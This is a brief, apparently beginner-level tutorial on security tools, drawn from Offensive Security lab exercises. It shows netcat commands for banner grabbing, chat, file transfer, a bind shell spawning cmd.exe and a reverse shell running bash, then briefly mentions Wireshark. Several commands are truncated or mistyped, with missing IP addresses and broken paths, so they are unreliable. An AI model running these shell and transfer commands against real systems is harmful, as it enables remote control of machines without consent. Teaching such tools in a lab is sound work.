Tools [Technology is nothing.]

Technology is nothing. What's important is that you have faith in people, that they're basically good and smart, and if you give them tools, they'll do wonderful things with them.

Long story short while watching a movie some time we came across characters with unfamiliar ascent which we are not used to and we can’t pick up their dialogues so we use subtitle feature likewise as security folks we come across a versatile situation where we are unable to grasp the happenings around the network  in this scenario we need additional tools to understand what’s going on to break the mystery.
There are many tools can be used but we will be going to learn most common tools run by security professionals.

         First, we will grab a tool called Netcat

Netcat is network utility able to read on both TCP and UDP port 

#connect to windows desktop
rddesktop -u offsec -p offsec!

#banner grabbing SMTP
nc -nv 25


nc -nv 110
USER bob
PASS bob

nc -nv 143
Create a chat room
windows machine
nc -h
nc server mode
nc -lvp 4444
kali machine
nc -nv 192.168.30.  4444
Hi how are you Shaik
Kali machine
I am good son in law
Transferring file
nc -nlvp 4444 > incoming.exe
locate wget.exe
nc -nv 4444 </usr/sharewindows-binaries/wget.exe
Remote connection

#Windows machine
nc -lvp 4444 -e cmd.exe
#Kali Linux machine
nc -vn 4444
Reverse connection

Windows Machine
nc -lvp 4444
Kali Linux machine
nc -vn 4444 -e usr/bin/bash

Wireshark capture read and display network traffic lets try it by typing Wireshark in kali console. A GUI interface will appear.

Wireshark is a very big tool. We can do an N number of things with it. What we did was just glance yes you can play around but stay safe because the shark has very sharp teeth as you know safety is our priority. 


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